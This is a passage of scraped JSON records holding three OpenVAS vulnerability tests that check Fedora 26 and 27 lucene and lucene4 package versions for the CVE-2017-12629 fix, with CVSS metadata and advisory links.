"2019-05-29T18:34:48", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-12-04T00:00:00", "type": "openvas", "title": "Fedora Update for lucene4 FEDORA-2017-195e7ea9a8", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12629"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310873831", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873831", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_195e7ea9a8_lucene4_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for lucene4 FEDORA-2017-195e7ea9a8\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873831\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-04 18:48:32 +0530 (Mon, 04 Dec 2017)\");\n script_cve_id(\"CVE-2017-12629\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for lucene4 FEDORA-2017-195e7ea9a8\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'lucene4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"lucene4 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-195e7ea9a8\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5EMMO4MG6W6IS5Y64EG3N466TKWVWY44\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"lucene4\", rpm:\"lucene4~4.10.4~11.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:46", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-11-02T00:00:00", "type": "openvas", "title": "Fedora Update for lucene FEDORA-2017-c7bdf540b4", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12629"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310873557", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873557", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_c7bdf540b4_lucene_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for lucene FEDORA-2017-c7bdf540b4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873557\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-02 18:05:38 +0530 (Thu, 02 Nov 2017)\");\n script_cve_id(\"CVE-2017-12629\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for lucene FEDORA-2017-c7bdf540b4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'lucene'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"lucene on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-c7bdf540b4\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4VSRNALKTFGMXF7R2WI7KXI3NSLHT7FM\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"lucene\", rpm:\"lucene~6.1.0~6.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:46", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-12-04T00:00:00", "type": "openvas", "title": "Fedora Update for lucene4 FEDORA-2017-0929e71b41", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12629"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310873836", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873836", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_0929e71b41_lucene4_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for lucene4 FEDORA-2017-0929e71b41\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873836\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-04 18:48:27 +0530 (Mon, 04 Dec 2017)\");\n script_cve_id(\"CVE-2017-12629\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for lucene4 FEDORA-2017-0929e71b41\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'lucene4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"lucene4 on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-0929e71b41\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RT6ISHPWQXJPASPQG4K5TNVXTFUEQQ4Q\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"lucene4\", rpm:\"lucene4~4.10.4~11.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P
Vulmap - Web Vulnerability Scanning And Verification Tools
